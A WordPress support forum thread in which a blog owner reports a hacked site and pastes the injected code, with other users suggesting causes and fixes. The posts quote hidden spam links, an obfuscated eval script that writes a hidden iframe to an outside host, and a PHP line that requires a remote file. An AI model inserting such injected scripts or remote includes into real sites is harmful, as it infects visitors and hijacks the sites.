Support » Developing with WordPress » WordPress Exploit: script inserted into code

  • Lately some of my WordPress blogs have been targeted by some hacker. Everytime I check out the source of my blogs I see these kind of links:

    </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>

    It has nothing to do with my theme, I’m using my own theme and I am 100% sure that the theme is not the source of the problem.

    I have been monitoring my weblogs to see what the cause of the problem is. Here is a list of what I tried to stop it:

    – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with htaccess (No effect)
    – Change FTP password
    – Check permissions of files and folders
    – Check plugins

    Another thing that I noticed is the following. Almost all of my themes also had the following code inserted at the end of the source code:

    <Script>
    <!--
    var d=document;
    eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
    //-->
    </Script>

    What I noticed is that the only solution was to rewrite the old WordPress files with the ones that I downloaded. I finally found where the code was being inserted: index.php in the root folder of the weblog.

    I would like to know the following things:

    – Is this because of my setup or is this some new WP exploit?
    – What can I do to stop these kind of exploits in the future?

    Thanks!

Viewing 15 replies - 1 through 15 (of 21 total)
  • Jeremy Clark

    (@jeremyclark13)

    Member

    [Post released from Askimet que]

    its an xss i think have you got a link to your site ?

    if its the amsterdam delete the comments i made they are secure

    I found a temporary fix for the problem:
    I chmodded index.php to 444. That seems to stop the problem at this moment.

    Is there anything else I can do?

    The problem is back again.

    Now they attacked the Wp-content index.php file
    This is what I found:

    <?php
    // Silence is golden.
    
    require('http://lovetabs.rxfeel.com/files/temp.php');
    
    ?>

    I’d talk to your host.

    Apparently I am not the only one:

    http://support.technorati.com/discussions/topic/3295

    Technorati noticed the issue also and mailed every single member that uses WordPress.

    whooami

    (@whooami)

    Member

    Technorati noticed the issue also and mailed every single member that uses WordPress.

    Thats simply not true, since I didnt get an e-mail. In fact, they have no way of doing such a thing.

    Yeah, I didn’t get an email either. They must not love you and me whoo. 😛

    Ian did post about it on the Technorati blog though. Any ideas what might be going on?

    I wouldn’t be too worried. It could be something, but a lot of people have crappy/insecure servers and then blame WordPress when they’re compromised.
    I have many many WordPress installations on a variety of different servers, and have never had one hacked.

    segal

    (@segal)

    I’m running WordPress 2.5.1 and today got the same problem. Does anyone knows, how can i prevent it?

    Site is http://dvicr.com. Code inserted on every index.php and every htm page on all my sites (my sites share same space on godaddy).

    obscure

    (@obscure)

    Here is a list of what I tried to stop it:

    – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with htaccess (No effect)
    – Change FTP password
    – Check permissions of files and folders
    – Check plugins

    Did you change your admin password?
    Did you delete all the compromised files and posts?

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I’d talk to your host about this soon.

    segal

    (@segal)

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I’d talk to your host about this soon.

    Yes, I’m on shared host, but it’s pretty secure (godaddy.com), so I don’t think anyone can break into other users area.

    Did you change your admin password?
    Did you delete all the compromised files and posts?

    Sure, and I also secured blog with all the knowledge I have. No evil scripts so far. I still wonder, how it got there in first place.

    Michael Torbert

    (@hallsofmontezuma)

    On all your sites? Doesn’t sound like a WordPress issue to me. Odds are, your server account or server itself has been compromised.
    Change all your server passwords (including mysql).

Viewing 15 replies - 1 through 15 (of 21 total)
  • The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.